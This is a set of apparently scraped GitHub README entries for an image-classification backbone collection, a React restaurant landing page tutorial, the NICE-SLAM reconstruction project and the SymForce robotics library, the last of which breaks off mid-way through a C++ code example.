|数据集|视频教程|人工智能技术探讨群| |---|---|---| | 花卉数据集 提取码:0zat | 点我跳转 | 1群:78174903 3群:584723646 快速开始 遵循 环境搭建 完成配置 下载 MobileNetV3-Small 权重至 datas 下 Awesome-Backbones 文件夹下终端输入 bash python tools/single_test.py datas/cat-dog.png models/mobilenet/mobilenet_v3_small.py --classes-map datas/imageNet1kAnnotation.txt 教程 环境搭建 数据集准备 配置文件解释 训练 模型评估 计算Flops&Params 添加新的模型组件 类别激活图可视化 学习率策略可视化 数据增强策略可视化 模型 [x] LeNet5 [x] AlexNet [x] VGG [x] DenseNet [x] ResNet [x] Wide-ResNet [x] ResNeXt [x] SEResNet [x] SEResNeXt [x] RegNet [x] MobileNetV2 [x] MobileNetV3 [x] ShuffleNetV1 [x] ShuffleNetV2 [x] EfficientNet [x] RepVGG [x] Res2Net [x] ConvNeXt [x] HRNet [x] ConvMixer [x] CSPNet [x] Swin-Transformer [x] Vision-Transformer [x] Transformer-in-Transformer [x] MLP-Mixer [x] DeiT [x] Conformer [x] T2T-ViT [x] Twins [x] PoolFormer [x] VAN [x] HorNet [x] EfficientFormer [x] Swin Transformer V2 [x] MViT V2 [x] MobileViT [x] DaViT [x] replknet [x] BEiT [x] EVA [x] MixMIM [x] EfficientNetV2 预训练权重 | 名称 | 权重 | 名称 | 权重 | 名称 | 权重 | | :-----: | :-----: | :------: | :------: | :------: | :-----: | | LeNet5 | None | AlexNet | None | VGG | VGG-11 VGG-13 VGG-16 VGG-19 VGG-11-BN VGG-13-BN VGG-16-BN VGG-19-BN | | ResNet | ResNet-18 ResNet-34 ResNet-50 ResNet-101 ResNet-152 | ResNetV1C | ResNetV1C-50 ResNetV1C-101 ResNetV1C-152 | ResNetV1D | ResNetV1D-50 ResNetV1D-101 ResNetV1D-152 | | ResNeXt | ResNeXt-50 ResNeXt-101 ResNeXt-152 | SEResNet | SEResNet-50 SEResNet-101 | SEResNeXt | None| | RegNet | RegNetX-400MF RegNetX-800MF RegNetX-1.6GF RegNetX-3.2GF RegNetX-4.0GF RegNetX-6.4GF RegNetX-8.0GF RegNetX-12GF | MobileNetV2 | MobileNetV2 | MobileNetV3 | MobileNetV3-Small MobileNetV3-Large | | ShuffleNetV1 | ShuffleNetV1 | ShuffleNetV2 | ShuffleNetV2 | EfficientNet | EfficientNet-B0 EfficientNet-B1 EfficientNet-B2 EfficientNet-B3 EfficientNet-B4 EfficientNet-B5 EfficientNet-B6 EfficientNet-B7 EfficientNet-B8 | | RepVGG | RepVGG-A0 RepVGG-A1 RepVGG-A2 RepVGG-B0 RepVGG-B1 RepVGG-A1 RepVGG-B1g2 RepVGG-B1g4 RepVGG-B2 RepVGG-B2g4 RepVGG-B2g4 RepVGG-B3 RepVGG-B3g4 RepVGG-D2se | Res2Net | Res2Net-50-14w-8s Res2Net-50-26w-8s Res2Net-101-26w-4s | ConvNeXt | ConvNeXt-Tiny ConvNeXt-Small ConvNeXt-Base ConvNeXt-Large ConvNeXt-XLarge | | HRNet | HRNet-W18 HRNet-W30 HRNet-W32 HRNet-W40 HRNet-W44 HRNet-W48 HRNet-W64 | ConvMixer | ConvMixer-768/32 ConvMixer-1024/20 ConvMixer-1536/20 | CSPNet | CSPDarkNet50 CSPResNet50 CSPResNeXt50 | | Swin Transformer | tiny-224 small-224 base-224 large-224 base-384 large-384 | Vision Transformer | vit_base_p16_224 vit_base_p32_224 vit_large_p16_224 vit_base_p16_384 vit_base_p32_384 vit_large_p16_384 | Transformer in Transformer | TNT-small | | MLP Mixer | base_p16 large_p16 | Deit | DeiT-tiny DeiT-tiny distilled DeiT-small DeiT-small distilled DeiT-base DeiT-base distilled DeiT-base 384px DeiT-base distilled 384px | Conformer | Conformer-tiny-p16 Conformer-small-p32 Conformer-small-p16 Conformer-base-p16 | | T2T-ViT | T2T-ViT_t-14 T2T-ViT_t-19 T2T-ViT_t-24 | Twins | PCPVT-small PCPVT-base PCPVT-large SVT-small SVT-base SVT-large | PoolFormer | PoolFormer-S12 PoolFormer-S24 PoolFormer-S36 PoolFormer-M36 PoolFormer-M48 | | DenseNet | DenseNet121 DenseNet161 DenseNet169 DenseNet201 | Visual Attention Network(VAN) | VAN-Tiny VAN-Small VAN-Base VAN-Large | Wide-ResNet | WRN-50 WRN-101 | | HorNet | HorNet-Tiny HorNet-Tiny-GF HorNet-Small HorNet-Small-GF HorNet-Base HorNet-Base-GF HorNet-Large HorNet-Large-GF HorNet-Large-GF384 | EfficientFormer | efficientformer-l1 efficientformer-l3 efficientformer-l7 | Swin Transformer v2 | tiny-256 window 8 tiny-256 window 16 small-256 window 8 small-256 window 16 base-256 window 8 base-256 window 16 large-256 window 16 large-384 window 24 | | MViTv2 | MViTv2-Tiny MViTv2-Small MViTv2-Base MViTv2-Large | MobileVit | MobileViT-XXSmall MobileViT-XSmall MobileViT-Small | DaViT | DaViT-T DaViT-S DaViT-B | | RepLKNet | RepLKNet-31B-224 RepLKNet-31B-384 RepLKNet-31L-384 RepLKNet-XL | BEiT | BEiT-base | EVA | EVA-G-p14-224 EVA-G-p14-336 EVA-G-p14-560 EVA-G-p16-224 EVA-L-p14-224 EVA-L-p14-196 EVA-L-p14-336 | MixMIM | mixmim-base | EfficientNetV2 | EfficientNetV2-b0 EfficientNetV2-b1 EfficientNetV2-b2 EfficientNetV2-b3 EfficientNetV2-s EfficientNetV2-m EfficientNetV2-l EfficientNetV2-xl | DeiT3 | deit3_small_p16 deit3_small_p16_384 deit3_base_p16 deit3_base_p16_384 deit3_medium_p16 deit3_large_p16 deit3_large_p16_384 deit3_huge_p16 | | EdgeNeXt | edgenext-base edgenext-small edgenext-X-small edgenext-XX-small | RevVisionTransformer | revvit-small revvit-base 我维护的其他项目 图片数据不够?我做了一款图像增强软件 一键转换与编辑图像标注文件软件,极大提高效率 参考 @repo{2020mmclassification, title={OpenMMLab's Image Classification Toolbox and Benchmark}, author={MMClassification Contributors}, howpublished = {\url{https://github.com/open-mmlab/mmclassification}}, year={2020} };Integrate deep learning models for image classification | Backbone learning/comparison/magic modification project;pytorch,image-classification,transformer,cnn,pytorch-classification,deep-learning,resnet,swin-transformer
Fafa-DL/Awesome-Backbones
adrianhajdin/project_modern_ui_ux_restaurant;Restaurant Landing Page Live Site 🌟 Become a top 1% Next.js 13 developer in only one course 🚀 Land your dream programming job in 6 months Stay up to date with new projects New major projects coming soon, subscribe to the mailing list to stay up to date https://resource.jsmasterypro.com/newsletter Introduction This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website You might be wondering, what are the prerequisites for building such an amazing website? Don't worry, this course is completely beginner-friendly! We're going to start easy and them move to more complex topics. Every step of the way will be explained. Alongside building the website, you'll learn: React Functional components and their reusability React file and folder structure Fundamental CSS properties to master flex & grid Fundamentals of the CSS BEM Model From soft and pleasant animations to complex gradients Perfectly placed media queries for satisfactory responsiveness covering almost devices And at the end you'll learn how to deploy your websites to extremely fast servers and give them a custom domain name.;This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website;react,reactjs,modern,ui,ux
adrianhajdin/project_modern_ui_ux_restaurant
cvg/nice-slam;NICE-SLAM: Neural Implicit Scalable Encoding for SLAM Zihan Zhu* · Songyou Peng* · Viktor Larsson · Weiwei Xu · Hujun Bao Zhaopeng Cui · Martin R. Oswald · Marc Pollefeys (* Equal Contribution) CVPR 2022 Paper | Video | Project Page NICE-SLAM produces accurate dense geometry and camera tracking on large-scale indoor scenes. (The black / red lines are the ground truth / predicted camera trajectory) Table of Contents Installation Visualization Demo Run iMAP* Evaluation Acknowledgement Citation Contact Installation First you have to make sure that you have all dependencies in place. The simplest way to do so, is to use anaconda . You can create an anaconda environment called nice-slam . For linux, you need to install libopenexr-dev before creating the environment. ```bash sudo apt-get install libopenexr-dev conda env create -f environment.yaml conda activate nice-slam ``` Visualizing NICE-SLAM Results We provide the results of NICE-SLAM ready for download. You can run our interactive visualizer as following. Self-captured Apartment To visualize our results on the self-captured apartment, as shown in the teaser: bash bash scripts/download_vis_apartment.sh python visualizer.py configs/Apartment/apartment.yaml --output output/vis/Apartment Note for users from China: If you encounter slow speed in downloading, check in all the scripts/download_*.sh scripts, where we also provide the 和彩云 links for you to download manually. ScanNet bash bash scripts/download_vis_scene0000.sh python visualizer.py configs/ScanNet/scene0000.yaml --output output/vis/scannet/scans/scene0000_00 You can find the results of NICE-SLAM on other scenes in ScanNet here . Replica bash bash scripts/download_vis_room1.sh python visualizer.py configs/Replica/room1.yaml --output output/vis/Replica/room1 [Directory structure of ScanNet (click to expand)] DATAROOT is ./Datasets by default. If a sequence ( sceneXXXX_XX ) is stored in other places, please change the input_folder path in the config file or in the command line. ``` DATAROOT └── scannet └── scans └── scene0000_00 └── frames ├── color │ ├── 0.jpg │ ├── 1.jpg │ ├── ... │ └── ... ├── depth │ ├── 0.png │ ├── 1.png │ ├── ... │ └── ... ├── intrinsic └── pose ├── 0.txt ├── 1.txt ├── ... └── ... ``` Once the data is downloaded and set up properly, you can run NICE-SLAM: bash python -W ignore run.py configs/ScanNet/scene0000.yaml Replica Download the data as below and the data is saved into the ./Datasets/Replica folder. Note that the Replica data is generated by the authors of iMAP, so please cite iMAP if you use the data. bash bash scripts/download_replica.sh and you can run NICE-SLAM: bash python -W ignore run.py configs/Replica/room0.yaml The mesh for evaluation is saved as $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply , where the unseen regions are culled using all frames. TUM RGB-D Download the data as below and the data is saved into the ./Datasets/TUM-RGBD folder bash bash scripts/download_tum.sh Now run NICE-SLAM: bash python -W ignore run.py configs/TUM_RGBD/freiburg1_desk.yaml Co-Fusion First, download the dataset. This script should download and unpack the data automatically into the ./Datasets/CoFusion folder. bash bash scripts/download_cofusion.sh Run NICE-SLAM: bash python -W ignore run.py configs/CoFusion/room4.yaml Use your own RGB-D sequence from Kinect Azure [Details (click to expand)] 1. Please first follow this [guide](http://www.open3d.org/docs/release/tutorial/sensor/azure_kinect.html#install-the-azure-kinect-sdk) to record a sequence and extract aligned color and depth images. (Remember to use `--align_depth_to_color` for `azure_kinect_recorder.py`) DATAROOT is `./Datasets` in default, if a sequence (`sceneXX`) is stored in other places, please change the "input_folder" path in the config file or in the command line. ``` DATAROOT └── Own └── scene0 ├── color │ ├── 00000.jpg │ ├── 00001.jpg │ ├── 00002.jpg │ ├── ... │ └── ... ├── config.json ├── depth │ ├── 00000.png │ ├── 00001.png │ ├── 00002.png │ ├── ... │ └── ... └── intrinsic.json ``` 2. Prepare `.yaml` file based on the `configs/Own/sample.yaml`. Change the camera intrinsics in the config file based on `intrinsic.json`. You can also get the intrinsics of the depth camera via other tools such as MATLAB. 3. Specify the bound of the scene. If no ground truth camera pose is given, we construct world coordinates on the first frame. The X-axis is from left to right, Y-axis is from down to up, Z-axis is from front to back. 4. Change the `input_folder` path and/or the `output` path in the config file or the command line. 5. Run NICE-SLAM. ```bash python -W ignore run.py configs/Own/sample.yaml ``` **(Optional but highly Recommended)** If you don't want to specify the bound of the scene or manually change the config file. You can first run the Redwood tool in [Open3D](http://www.open3d.org/) and then run NICE-SLAM. Here we provide steps for the whole pipeline, beginning from recording Azure Kinect videos. (Ubuntu 18.04 and above is recommended.) 1. Download the Open3D repository. ```bash bash scripts/download_open3d.sh ``` 2. Record and extract frames. ```bash # specify scene ID sceneid=0 cd 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/ # record and save to .mkv file python sensors/azure_kinect_recorder.py --align_depth_to_color --output scene$sceneid.mkv # extract frames python sensors/azure_kinect_mkv_reader.py --input scene$sceneid.mkv --output dataset/scene$sceneid ``` 3. Run reconstruction. ```bash python run_system.py dataset/scene$sceneid/config.json --make --register --refine --integrate # back to main folder cd ../../../../../ ``` 4. Prepare the config file. ```bash python src/tools/prep_own_data.py --scene_folder 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/dataset/scene$sceneid --ouput_config configs/Own/scene$sceneid.yaml ``` 5. Run NICE-SLAM. ```bash python -W ignore run.py configs/Own/scene$sceneid.yaml ``` iMAP* We also provide our re-implementation of iMAP (iMAP*) for use. If you use the code, please cite both the original iMAP paper and NICE-SLAM. Usage iMAP shares a majority part of the code with NICE-SLAM. To run iMAP , simply use *_imap.yaml in the config file and also add the argument --imap in the command line. For example, to run iMAP* on Replica room0: bash python -W ignore run.py configs/Replica/room0_imap.yaml --imap To use our interactive visualizer: bash python visualizer.py configs/Replica/room0_imap.yaml --imap To evaluate ATE: bash python src/tools/eval_ate.py configs/Replica/room0_imap.yaml --imap [ Differences between iMAP* and the original iMAP (click to expand)] #### Keyframe pose optimization during mapping We do not optimize the selected keyframes' poses for iMAP*, because optimizing them usually leads to worse performance. One possible reason is that since their keyframes are selected globally, and many of them do not have overlapping regions especially when the scene gets larger. Overlap is a prerequisite for bundle adjustment (BA). For NICE-SLAM, we only select overlapping keyframes within a small window (local BA), which works well in all scenes. You can still turn on the keyframe pose optimization during mapping for iMAP* by enabling `BA` in the config file. #### Active sampling We disable the active sampling in iMAP*, because in our experiments we observe that it does not help to improve the performance while brings additional computational overhead. For the image active sampling, in each iteration the original iMAP uniformly samples 200 pixels in the entire image. Next, they divide this image into an 8x8 grid and calculate the probability distribution from the rendering losses. This means that if the resolution of an image is 1200x680 (Replica), only around 3 pixels are sampled to calculate the distribution for a 150x85 grid patch. This is not too much different from simple uniform sampling. Therefore, during mapping we use the same pixel sampling strategy as NICE-SLAM for iMAP*: uniform sampling, but even 4x more pixels than reported in the iMAP paper. For the keyframe active sampling, the original iMAP requires rendering depth and color images for all keyframes to get the loss distribution, which is expensive and we again did not find it very helpful. Instead, as done in NICE-SLAM, iMAP* randomly samples keyframes from the keyframe list. We also let iMAP* optimize for 4x more iterations than NICE-SLAM, but their performance is still inferior. #### Keyframe selection For fair comparison, we use the same keyframe selection method in iMAP* as in NICE-SLAM: add one keyframe to the keyframe list every 50 frames. Evaluation Average Trajectory Error To evaluate the average trajectory error. Run the command below with the corresponding config file: bash python src/tools/eval_ate.py configs/Replica/room0.yaml Reconstruction Error To evaluate the reconstruction error, first download the ground truth Replica meshes where unseen region have been culled. bash bash scripts/download_cull_replica_mesh.sh Then run the command below (same for NICE-SLAM and iMAP*). The 2D metric requires rendering of 1000 depth images, which will take some time (~9 minutes). Use -2d to enable 2D metric. Use -3d to enable 3D metric. ```bash assign any output_folder and gt mesh you like, here is just an example OUTPUT_FOLDER=output/Replica/room0 GT_MESH=cull_replica_mesh/room0.ply python src/tools/eval_recon.py --rec_mesh $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply --gt_mesh $GT_MESH -2d -3d ``` We also provide code to cull the mesh given camera poses. Here we take culling of ground truth mesh of Replica room0 as an example. bash python src/tools/cull_mesh.py --input_mesh Datasets/Replica/room0_mesh.ply --traj Datasets/Replica/room0/traj.txt --output_mesh cull_replica_mesh/room0.ply [For iMAP* evaluation (click to expand)] As discussed in many recent papers, e.g. UNISURF/VolSDF/NeuS, manual thresholding the volume density during marching cubes might be needed. Moreover, we find out there exist scaling differences, possibly because of the reason discussed in [NeuS](https://arxiv.org/abs/2106.10689). Therefore, ICP with scale is needed. You can use the [ICP tool](https://www.cloudcompare.org/doc/wiki/index.php?title=ICP) in [CloudCompare](https://www.danielgm.net/cc/) with default configuration with scaling enabled. Acknowledgement We adapted some codes from some awesome repositories including convolutional_occupancy_networks , nerf-pytorch , lietorch , and DIST-Renderer . Thanks for making codes public available. We also thank Edgar Sucar for allowing us to make the Replica Dataset available. Citation If you find our code or paper useful, please cite bibtex @inproceedings{Zhu2022CVPR, author = {Zhu, Zihan and Peng, Songyou and Larsson, Viktor and Xu, Weiwei and Bao, Hujun and Cui, Zhaopeng and Oswald, Martin R. and Pollefeys, Marc}, title = {NICE-SLAM: Neural Implicit Scalable Encoding for SLAM}, booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2022} } Contact Contact Zihan Zhu and Songyou Peng for questions, comments and reporting bugs.;[CVPR'22] NICE-SLAM: Neural Implicit Scalable Encoding for SLAM;slam,neural-fields,neural-implicit-representations,scalable,implicit-functions,localization,deep-learning,3d-reconstruction
cvg/nice-slam
symforce-org/symforce;SymForce is a fast symbolic computation and code generation library for robotics applications like computer vision, state estimation, motion planning, and controls. It combines the development speed and flexibility of symbolic mathematics with the performance of autogenerated, highly optimized code in C++ or any target runtime language. SymForce contains three independently useful systems: Symbolic Toolkit - builds on the SymPy API to provide rigorous geometric and camera types, lie group calculus, singularity handling, and tools to model complex problems Code Generator - transforms symbolic expressions into blazing-fast, branchless code with clean APIs and minimal dependencies, with a template system to target any language Optimization Library - a fast tangent-space optimization library based on factor graphs, with a highly optimized implementation for real-time robotics applications SymForce automatically computes tangent space Jacobians, eliminating the need for any bug-prone handwritten derivatives. Generated functions can be directly used as factors in our nonlinear optimizer. This workflow enables faster runtime functions, faster development time, and fewer lines of handwritten code versus alternative methods. SymForce is developed and maintained by Skydio . It is used in production to accelerate tasks like SLAM, bundle adjustment, calibration, and sparse nonlinear MPC for autonomous robots at scale. Features Symbolic implementations of geometry and camera types with Lie group operations Code generation of fast native runtime code from symbolic expressions, reducing duplication and minimizing bugs Novel tools to compute fast and correct tangent-space jacobians for any expression, avoiding all handwritten derivatives Strategies for flattening computation and leveraging sparsity that can yield 10x speedups over standard autodiff A fast tangent-space optimization library in C++ and Python based on factor graphs Rapid prototyping and analysis of complex problems with symbolic math, with a seamless workflow into production use Embedded-friendly C++ generation of templated Eigen code with zero dynamic memory allocation Highly performant, modular, tested, and extensible code Read the paper: https://arxiv.org/abs/2204.07889 And watch the video: https://youtu.be/QO_ltJRNj0o SymForce was published to RSS 2022 . Please cite it as follows: @inproceedings{Martiros-RSS-22, author = {Hayk Martiros AND Aaron Miller AND Nathan Bucki AND Bradley Solliday AND Ryan Kennedy AND Jack Zhu AND Tung Dang AND Dominic Pattison AND Harrison Zheng AND Teo Tomic AND Peter Henry AND Gareth Cross AND Josiah VanderMey AND Alvin Sun AND Samuel Wang AND Kristen Holtz}, title = {{SymForce: Symbolic Computation and Code Generation for Robotics}}, booktitle = {Proceedings of Robotics: Science and Systems}, year = {2022}, doi = {10.15607/RSS.2022.XVIII.041} } Install Install with pip: bash pip install symforce Verify the installation in Python: ```python import symforce.symbolic as sf sf.Rot3() ``` This installs pre-compiled C++ components of SymForce on Linux and Mac using pip wheels, but does not include C++ headers. If you want to compile against C++ SymForce types (like sym::Optimizer ), you currently need to build from source . Tutorial Let's walk through a simple example of modeling and solving an optimization problem with SymForce. In this example a robot moves through a 2D plane and the goal is to estimate its pose at multiple time steps given noisy measurements. The robot measures: the distance it traveled from an odometry sensor relative bearing angles to known landmarks in the scene The robot's heading angle is defined counter-clockwise from the x-axis, and its relative bearing measurements are defined from the robot's forward direction: Explore the math Import the SymForce symbolic API, which contains the augmented SymPy API, as well as geometry and camera types: python import symforce.symbolic as sf Create a symbolic 2D pose and landmark location. Using symbolic variables lets us explore and build up the math in a pure form. python pose = sf.Pose2( t=sf.V2.symbolic("t"), R=sf.Rot2.symbolic("R") ) landmark = sf.V2.symbolic("L") Let's transform the landmark into the local frame of the robot. We choose to represent poses as world_T_body , meaning that to take a landmark in the world frame and get its position in the body frame, we do: python landmark_body = pose.inverse() * landmark $$ \begin{bmatrix} R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0 \ -R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1 \end{bmatrix} $$ You can see that sf.Rot2 is represented internally by a complex number (𝑅𝑟𝑒, 𝑅𝑖𝑚) and we can study how it rotates the landmark 𝐿. For exploration purposes, let's take the jacobian of the body-frame landmark with respect to the tangent space of the Pose2 , parameterized as (𝜃, 𝑥, 𝑦): python landmark_body.jacobian(pose) $$ \begin{bmatrix} -L_0 R_{im} + L_1 R_{re} + t_0 R_{im} - t_1 R_{re}, & -R_{re}, & -R_{im} \ -L_0 R_{re} - L_1 R_{im} + t_0 R_{re} + t_1 R_{im}, & R_{im}, & -R_{re} \end{bmatrix} $$ Note that even though the orientation is stored as a complex number, the tangent space is a scalar angle and SymForce understands that. Now compute the relative bearing angle: python sf.atan2(landmark_body[1], landmark_body[0]) $$ atan_2(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1, R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0) $$ One important note is that atan2 is singular at (0, 0). In SymForce we handle this by placing a symbol ϵ (epsilon) that preserves the value of an expression in the limit of ϵ → 0, but allows evaluating at runtime with a very small nonzero value. Functions with singularities accept an epsilon argument: python sf.V3.symbolic("x").norm(epsilon=sf.epsilon()) $$ \sqrt{x_0^2 + x_1^2 + x_2^2 + \epsilon} $$ See the Epsilon Tutorial in the SymForce Docs for more information. Build an optimization problem We will model this problem as a factor graph and solve it with nonlinear least-squares. First, we need to tell SymForce to use a nonzero epsilon to prevent singularities. This isn't necessary when playing around with symbolic expressions like we were above, but it's important now that we want to numerically evaluate some results. For more information, check out the Epsilon Tutorial - for now, all you need to do is this: python import symforce symforce.set_epsilon_to_symbol() This needs to be done before other parts of symforce are imported - if you're following along in a notebook you should add this at the top and restart the kernel. Now that epsilon is set up, we will instantiate numerical Values for the problem, including an initial guess for our unknown poses (just set them to identity). ```python import numpy as np from symforce.values import Values num_poses = 3 num_landmarks = 3 initial_values = Values( poses=[sf.Pose2.identity()] * num_poses, landmarks=[sf.V2(-2, 2), sf.V2(1, -3), sf.V2(5, 2)], distances=[1.7, 1.4], angles=np.deg2rad([[145, 335, 55], [185, 310, 70], [215, 310, 70]]).tolist(), epsilon=sf.numeric_epsilon, ) ``` Next, we can set up the factors connecting our variables. The residual function comprises of two terms - one for the bearing measurements and one for the odometry measurements. Let's formalize the math we just defined for the bearing measurements into a symbolic residual function: python def bearing_residual( pose: sf.Pose2, landmark: sf.V2, angle: sf.Scalar, epsilon: sf.Scalar ) -> sf.V1: t_body = pose.inverse() * landmark predicted_angle = sf.atan2(t_body[1], t_body[0], epsilon=epsilon) return sf.V1(sf.wrap_angle(predicted_angle - angle)) This function takes in a pose and landmark variable and returns the error between the predicted bearing angle and a measured value. Note that we call sf.wrap_angle on the angle difference to prevent wraparound effects. The residual for distance traveled is even simpler: python def odometry_residual( pose_a: sf.Pose2, pose_b: sf.Pose2, dist: sf.Scalar, epsilon: sf.Scalar ) -> sf.V1: return sf.V1((pose_b.t - pose_a.t).norm(epsilon=epsilon) - dist) Now we can create Factor objects from the residual functions and a set of keys. The keys are named strings for the function arguments, which will be accessed by name from a Values class we later instantiate with numerical quantities. ```python from symforce.opt.factor import Factor factors = [] Bearing factors for i in range(num_poses): for j in range(num_landmarks): factors.append(Factor( residual=bearing_residual, keys=[f"poses[{i}]", f"landmarks[{j}]", f"angles[{i}][{j}]", "epsilon"], )) Odometry factors for i in range(num_poses - 1): factors.append(Factor( residual=odometry_residual, keys=[f"poses[{i}]", f"poses[{i + 1}]", f"distances[{i}]", "epsilon"], )) ``` Here is a visualization of the structure of this factor graph: Solve the problem Our goal is to find poses of the robot that minimize the residual of this factor graph, assuming the landmark positions in the world are known. We create an Optimizer with these factors and tell it to only optimize the pose keys (the rest are held constant): ```python from symforce.opt.optimizer import Optimizer optimizer = Optimizer( factors=factors, optimized_keys=[f"poses[{i}]" for i in range(num_poses)], # So that we save more information about each iteration, to visualize later: debug_stats=True, ) ``` Now run the optimization! This returns an Optimizer.Result object that contains the optimized values, error statistics, and per-iteration debug stats (if enabled). python result = optimizer.optimize(initial_values) We can check that the optimization succeeded, and look at the final error: python assert result.status == Optimizer.Status.SUCCESS print(result.error()) Let's visualize what the optimizer did. The orange circles represent the fixed landmarks, the blue circles represent the robot, and the dotted lines represent the bearing measurements. python from symforce.examples.robot_2d_localization.plotting import plot_solution plot_solution(optimizer, result) All of the code for this example can also be found in symforce/examples/robot_2d_localization . Symbolic vs Numerical Types SymForce provides sym packages with runtime code for geometry and camera types that are generated from its symbolic geo and cam packages. As such, there are multiple versions of a class like Pose3 and it can be a common source of confusion. The canonical symbolic class sf.Pose3 lives in the symforce package: python sf.Pose3.identity() The autogenerated Python runtime class sym.Pose3 lives in the sym package: python import sym sym.Pose3.identity() The autogenerated C++ runtime class sym::Pose3 lives in the sym:: namespace: C++ sym::Pose3<double>::Identity() The matrix type for symbolic code is sf.Matrix , for generated Python is numpy.ndarray , and for C++ is Eigen::Matrix . The symbolic classes can also handle numerical values, but will be dramatically slower than the generated classes. The symbolic classes must be used when defining functions for codegen and optimization. Generated functions always accept the runtime types. The Codegen or Factor objects require symbolic types and functions to do math and generate code. However, once code is generated, numerical types should be used when invoking generated functions and in the initial values when calling the Optimizer . As a convenience, the Python Optimizer class can accept symbolic types in its Values and convert to numerical types before invoking generated functions. This is done in the tutorial example for simplicity. Generate runtime C++ code Let's look under the hood to understand how that optimization worked. For each factor, SymForce introspects the form of the symbolic function, passes through symbolic inputs to build an output expression, automatically computes tangent-space jacobians of those output expressions w.r.t. the optimized variables, and generates fast runtime code for them. The Codegen class is the central tool for generating runtime code from symbolic expressions. In this case, we pass it the bearing residual function and configure it to generate C++ code: ```python from symforce.codegen import Codegen, CppConfig codegen = Codegen.function(bearing_residual, config=CppConfig()) ``` We can then create another Codegen object that computes a Gauss-Newton linearization from this Codegen object. It does this by introspecting and symbolically differentiating the given arguments: python codegen_linearization = codegen.with_linearization( which_args=["pose"] ) Generate a C++ function that computes the linearization wrt the pose argument: python metadata = codegen_linearization.generate_function() print(open(metadata.generated_files[0]).read()) This C++ code depends only on Eigen and computes the results in a single flat function that shares all common sub-expressions: ```c++ pragma once include include namespace sym { / * This function was autogenerated from a symbolic function. Do not modify by hand. * * Symbolic function: bearing_residual * * Args: * pose: Pose2 * landmark: Matrix21 * angle: Scalar * epsilon: Scalar * * Outputs: * res: Matrix11 * jacobian: (1x3) jacobian of res wrt arg pose (3) * hessian: (3x3) Gauss-Newton hessian for arg pose (3) * rhs: (3x1) Gauss-Newton rhs for arg pose (3) / template void BearingFactor(const sym::Pose2 & pose, const Eigen::Matrix & landmark, const Scalar angle, const Scalar epsilon, Eigen::Matrix const res = nullptr, Eigen::Matrix const jacobian = nullptr, Eigen::Matrix const hessian = nullptr, Eigen::Matrix * const rhs = nullptr) { // Total ops: 66 // Input arrays const Eigen::Matrix & _pose = pose.Data(); // Intermediate terms (24) const Scalar _tmp0 = _pose[1] * _pose[2]; const Scalar _tmp1 = _pose[0] * _pose[3]; const Scalar _tmp2 = _pose[0] * landmark(1, 0) - _pose[1] * landmark(0, 0); const Scalar _tmp3 = _tmp0 - _tmp1 + _tmp2; const Scalar _tmp4 = _pose[0] * _pose[2] + _pose[1] * _pose[3]; const Scalar _tmp5 = _pose[1] * landmark(1, 0); const Scalar _tmp6 = _pose[0] * landmark(0, 0); const Scalar _tmp7 = -_tmp4 + _tmp5 + _tmp6; const Scalar _tmp8 = _tmp7 + epsilon * ((((_tmp7) > 0) - ((_tmp7) < 0)) + Scalar(0.5)); const Scalar _tmp9 = -angle + std::atan2(_tmp3, _tmp8); const Scalar _tmp10 = _tmp9 - 2 * Scalar(M_PI) * std::floor((Scalar(1) / Scalar(2)) * (_tmp9 + Scalar(M_PI)) / Scalar(M_PI)); const Scalar _tmp11 = Scalar(1.0) / (_tmp8); const Scalar _tmp12 = std::pow(_tmp8, Scalar(2)); const Scalar _tmp13 = _tmp3 / _tmp12; const Scalar _tmp14 = _tmp11 * (_tmp4 - _tmp5 - _tmp6) - _tmp13 * (_tmp0 - _tmp1 + _tmp2); const Scalar _tmp15 = _tmp12 + std::pow(_tmp3, Scalar(2)); const Scalar _tmp16 = _tmp12 / _tmp15; const Scalar _tmp17 = _tmp14 * _tmp16; const Scalar _tmp18 = _pose[0] * _tmp13 + _pose[1] * _tmp11; const Scalar _tmp19 = _tmp16 * _tmp18; const Scalar _tmp20 = -_pose[0] * _tmp11 + _pose[1] * _tmp13; const Scalar _tmp21 = _tmp16 * _tmp20; const Scalar _tmp22 = std::pow(_tmp8, Scalar(4)) / std::pow(_tmp15, Scalar(2)); const Scalar _tmp23 = _tmp18 * _tmp22; // Output terms (4) if (res != nullptr) { Eigen::Matrix & _res = (*res); _res(0, 0) = _tmp10; } if (jacobian != nullptr) { Eigen::Matrix & _jacobian = (*jacobian); _jacobian(0, 0) = _tmp17; _jacobian(0, 1) = _tmp19; _jacobian(0, 2) = _tmp21; } if (hessian != nullptr) { Eigen::Matrix & _hessian = (*hessian); _hessian(0, 0) = std::pow(_tmp14, Scalar(2)) * _tmp22; _hessian(0, 1) = 0; _hessian(0, 2) = 0; _hessian(1, 0) = _tmp14 * _tmp23; _hessian(1, 1) = std::pow(_tmp18, Scalar(2)) * _tmp22; _hessian(1, 2) = 0; _hessian(2, 0) = _tmp14 * _tmp20 * _tmp22; _hessian(2, 1) = _tmp20 * _tmp23; _hessian(2, 2) = std::pow(_tmp20, Scalar(2)) * _tmp22; } if (rhs != nullptr) { Eigen::Matrix & _rhs = (*rhs); _rhs(0, 0) = _tmp10 * _tmp17; _rhs(1, 0) = _tmp10 * _tmp19; _rhs(2, 0) = _tmp10 * _tmp21; } } } // namespace sym ``` SymForce can also generate runtime Python code that depends only on numpy . The code generation system is written with pluggable jinja templates to minimize the work to add new backend languages. Some of our top candidates to add are TypeScript, CUDA, and PyTorch. Optimize from C++ Now that we can generate C++ functions for each residual function, we can also run the optimization purely from C++ to get Python entirely out of the loop for production use. ```c++ const int num_poses = 3; const int num_landmarks = 3; std::vector > factors; // Bearing factors for (int i = 0; i < num_poses; ++i) { for (int j = 0; j < num_landmarks; ++j) { factors.push_back(sym::Factor ::Hessian( sym::BearingFactor , {{'P', i}, {'L', j}, {'a', i, 